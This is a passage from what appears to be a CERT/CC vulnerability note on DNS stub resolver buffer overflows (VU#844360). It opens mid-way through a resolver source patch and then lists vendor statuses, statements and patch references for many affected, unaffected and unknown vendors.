<< shift;` \n`+ shift += 8;` \n`+ ++p;` \n`+` \n`+ /* If we are out of digits now, there are two cases:` \n`+ 1. We are done with digits and now see \"in-addr.arpa\".` \n`+ 2. This is not the droid we are looking for. */` \n`+ if (!isdigit (*p) && !strcasecmp (p, \"in-addr.arpa\"))` \n`+ {` \n`+ result->n_net = val;` \n`+ return NSS_STATUS_SUCCESS;` \n`+ }` \n`+` \n`+ /* Keep going when we have seen fewer than 4 parts. */` \n`+ } while (shift < 32);` \n`+ }` \n`+ }` \n` break;` \n` }` \n`-` \n`- ++result->n_aliases;` \n`- return NSS_STATUS_SUCCESS;` \n` }` \n \n` __set_h_errno (TRY_AGAIN);`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Hewlett-Packard Company __ Affected\n\nNotified: November 12, 2002 Updated: April 15, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee: SSRT2270, SSRT2322/HPSBUX0303-209\n\n&lt;<http://ftp.support.compaq.com/patches/.new/unix.shtml>&gt;\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### IBM __ Affected\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe AIX operating system is vulnerable to the named and DNS resolver issues in releases 4.3.3, 5.1.0 and 5.2.0. The following APARs are available:\n\n> AIX 4.3.3 APAR IY37088 (available)AIX 5.1.0 APAR IY37091 (available)AIX 5.2.0 APAR IY37289 (available)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### ISC __ Affected\n\nNotified: October 22, 2002 Updated: November 13, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease reference the \"LIBRESOLV: buffer overrun\" section of the ISC [BIND Vulnerabilities](<http://www.isc.org/products/BIND/bind-security.html>) web page.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### MetaSolv Software Inc. __ Affected\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nVU#844360 - Domain Name System (DNS) stub resolver libraries vulnerable to buffer overflows via network name or address lookups (VU#852283 - CAN-2002-1219 / VU#229595 - CAN-2002-1220 / VU#581682 - CAN-2002-1221/ VU#844360 - CAN-2002-0029) was addressed in Policy Services 4.2 Service Pack 1 efix 1. The vulnerability can be avoided by upgrading to Policy Services 4.2 Service Pack 1 efix 1 from MetaSolv Policy Services 4.1 and 4.2 (base). The efix includes all ISC sanctioned patches to BIND 8.2.6. to remedy this vulnerability. Please contact MetaSolv Global Customer Care [supporthd@metasolv.com](<mailto:supporthd@metasolv.com>) for assistance.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### NetBSD __ Affected\n\nNotified: November 12, 2002 Updated: February 25, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n&lt;<ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-028.txt.asc>&gt;\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Openwall GNU/*/Linux __ Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nBIND 4.9.10-OW2 includes the patch provided by ISC and thus has the two vulnerabilities affecting BIND 4 fixed. Previous versions of BIND 4.9.x-OW patches, if used properly, significantly reduced the impact of the \"named\" vulnerability. The patches are available at their usual location:\n\n<http://www.openwall.com/bind/> \n \nA patch against BIND 4.9.11 will appear as soon as this version is officially released, although it will likely be effectively the same as the currently available 4.9.10-OW2. \n \nIt hasn't been fully researched whether the resolver code in glibc, and in particular on Openwall GNU/*/Linux, shares any of the newly discovered BIND 4 resolver library vulnerabilities. Analysis is in progress.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### SGI __ Affected\n\nNotified: November 12, 2002 Updated: December 05, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see SGI Security Advisory [20021201-01-P](<ftp://patches.sgi.com/support/free/security/advisories/20021201-01-P>).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Sun Microsystems Inc. __ Affected\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe Solaris DNS resolver library (libresolv(3LIB)) is affected by VU#844360 in the following supported versions of Solaris:\n\nSolaris 2.6 \n \nPatches are being generated for all of the above releases. Sun will be publishing a Sun Alert for this issue at the following location shortly: \n \n<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F48818> \n \nThe patches will be available from: \n \n<http://sunsolve.sun.com/securitypatch>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### The SCO Group __ Affected\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nOpenLinux\n\n&lt;<ftp://ftp.sco.com/pub/security/OpenLinux/CSSA-2002-059.0.txt>&gt; \n \nUnixWare 7.1.1 \n&lt;<ftp://ftp.sco.com/pub/updates/UnixWare/CSSA-2003-SCO.2/CSSA-2003-SCO.2.txt>&gt;\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Xerox Corporation __ Affected\n\nNotified: November 12, 2002 Updated: April 24, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nA response to this vulnerability is available from our web site: [http://www.xerox.com/security](<http://www.xerox.com/security/>).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### FreeBSD __ Not Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe FreeBSD libc resolver is not affected by the issues described in VU#844360.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### NcFTP Software __ Not Affected\n\nUpdated: December 05, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNcFTPd Server, NcFTP Client, and LibNcFTP are not affected. We do not use the getnetbyname() or getnetbyaddr() functions in our code.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### OpenBSD Not Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### PADL Software __ Not Affected\n\nNotified: November 14, 2002 Updated: November 14, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nI don't believe nss_ldap is vulnerable. We implement our own getnetby*() but it has nothing to do with the resolver library (except insofaras we support the BIND IRS).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### AT&amp;T Unknown\n\nNotified: November 12, 2002 Updated: April 04, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Alcatel __ Unknown\n\nNotified: November 12, 2002 Updated: February 25, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nFollowing CERT advisory CA-2002-31 on security vulnerabilities in the ISC BIND implementation, Alcatel has conducted an immediate assessment to determine any impact this may have on our portfolio. A first analysis has shown that the following products (OmniSwitch 6600, 7700, 8800) may be impacted. Customers may wish to contact their support for more details. The security of our customers' networks is of highest priority for Alcatel. Therefore we continue to test our product portfolio against potential ISC BIND security vulnerabilities and will provide updates if necessary.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Avaya Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### BlueCat Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Check Point Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Cisco Systems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Computer Associates Unknown\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Conectiva Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Cray Inc. __ Unknown\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nCray Inc. may be vulnerable and has opened spr 723892 to investigate.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### D-Link Systems Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Data General Unknown\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Debian Unknown\n\nNotified: November 12, 2002 Updated: February 26, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### F5 Networks Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### FreeRADIUS Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Fujitsu Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Funk Software Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### GNU adns Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Guardian Digital Inc. Unknown\n\nNotified: November 12, 2002 Updated: April 04, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Intel Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Juniper Networks Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### KTH Kerberos __ Unknown\n\nNotified: November 14, 2002 Updated: November 14, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNeither Heimdal nor KTH Kerberos 4 use getnetby*() directly.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Lotus Software Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Lucent Technologies Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### MandrakeSoft Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Men&amp;Mice Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### MiT Kerberos Development Team Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Microsoft Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### MontaVista Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### NEC Corporation Unknown\n\nNotified: November 12, 2002 Updated: April 04, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Network Appliance Unknown\n\nNotified: November 12, 2002 Updated: April 04, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Nixu Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Nokia Unknown\n\nNotified: November 12, 2002 Updated: November 13, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Nominum Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Nortel Networks __ Unknown\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nNortel Networks is determining whether NetID or Optivity NMS are potentially affected by the vulnerabilities identified in CERT/CC Advisory CA-2002-31 and will update this Vendor Statement accordingly.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### OpenSSH Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### PuTTY Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Red Hat Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Sequent Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Sony Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### SuSE Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### The Open Group Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Trend Micro Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Trustix __ Unknown\n\nUpdated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n&lt;<http://www.trustix.net/errata/misc/2002/TSL-2002-0076-bind.asc.txt>&gt;\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Unisys Unknown\n\nNotified: November 12, 2002 Updated: April 04, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### 